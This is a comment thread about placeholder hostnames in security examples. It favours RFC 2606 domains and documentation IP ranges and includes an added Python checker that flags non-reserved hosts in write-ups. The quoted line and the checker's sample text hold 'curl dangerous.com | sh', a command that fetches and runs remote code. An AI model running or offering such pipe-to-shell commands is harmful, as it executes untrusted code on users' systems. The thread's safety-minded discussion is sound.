by rooodini 4156 days ago
> […] as dangerous as `curl dangerous.com | sh`.

dangerous.com appears to be a saucy outfits retailer. Irrespective of the name, piping the HTML to sh is probably fine.

3 comments

I often wonder about the results of people using functional hostnames in their examples. Most PoC exploit code uses "target.com" as a placeholder, which makes sense, but hilariously is also the hostname for US retailer Target...
This is exactly the reason example.com exists
Yep, RFC 2606. It is what they should use. And if you need to specify 2 hosts, you can use example.net and .org as well.

Unfortunately, the example domains don't convey context very well, so we see things like target.com, victim.com, etc.

This can be corrected by target.example.com and victim.example.com. Conveys the context while remaining safe as an example.
That generally works, although in some cases it makes a difference whether two hosts are on the same TLD; at the very least, it implies a connection between the two that may not always make sense (why is aggressor.example.com attacking victim.example.com?).
The same goes for TEST-NET (192.0.2.0/24), TEST-NET-2 (198.51.100.0/24), TEST-NET-3 (203.0.113.0/24), MCAST-TEST-NET (233.252.0.0/24), and the IPv6 documentation-only prefix (2001:db8::/32).
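
A checker for write-ups and PoC text that flags any hostname or IP address outside the reserved documentation names and prefixes listed in this thread. This is an added example, not posted by any commenter; the function names and the sample text are constructed, and the four reserved TLDs are taken from RFC 2606 rather than from the thread.

```python
import ipaddress
import re

# Reserved for documentation. The three example.* domains and the five
# prefixes are the ones named in the thread; the four TLDs are the other
# names RFC 2606 reserves.
DOC_DOMAINS = ("example.com", "example.net", "example.org")
DOC_TLDS = (".example", ".test", ".invalid", ".localhost")
DOC_NETS = [ipaddress.ip_network(n) for n in (
    "192.0.2.0/24", "198.51.100.0/24", "203.0.113.0/24",
    "233.252.0.0/24", "2001:db8::/32")]

HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
IP_RES = (  # candidate IPv4 and IPv6 literals; ipaddress does the real validation
    re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"),
    re.compile(r"(?<![\w:])[0-9a-f]{0,4}(?::[0-9a-f]{0,4}){2,7}(?![\w:])", re.I),
)

def is_reserved_host(host):
    """True if host is a reserved example domain, a subdomain of one, or under a reserved TLD."""
    host = host.lower()
    return (host in DOC_DOMAINS
            or host.endswith(tuple("." + d for d in DOC_DOMAINS))
            or host.endswith(DOC_TLDS))

def is_reserved_address(text):
    """True/False for a valid IP address, None if text is not an address at all."""
    try:
        addr = ipaddress.ip_address(text)
    except ValueError:
        return None
    return any(addr in net for net in DOC_NETS)

def find_unreserved(text):
    """Return (line_number, value) for every host or IP outside the reserved sets."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        hits += [(no, h) for h in HOST_RE.findall(line) if not is_reserved_host(h)]
        for rx in IP_RES:
            hits += [(no, a) for a in rx.findall(line) if is_reserved_address(a) is False]
    return hits

# Constructed sample text mixing real and reserved values.
SAMPLE = """curl dangerous.com | sh
PoC against target.com, rewritten as target.example.com
ping 203.0.113.7 and 8.8.8.8
listen on 2001:db8::10, resolver 2001:4860:4860::8888"""

if __name__ == "__main__":
    for no, value in find_unreserved(SAMPLE):
        print(f"line {no}: {value} is not a reserved documentation value")
```

The hostname pattern is deliberately loose, so file names such as `install.sh` are also reported and need a manual look.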
But of course they could do some fancy user agent check to only give malicious stuff when requested by curl.
Heh. Check out http://hashbang.sh, it's both HTML and shell script :)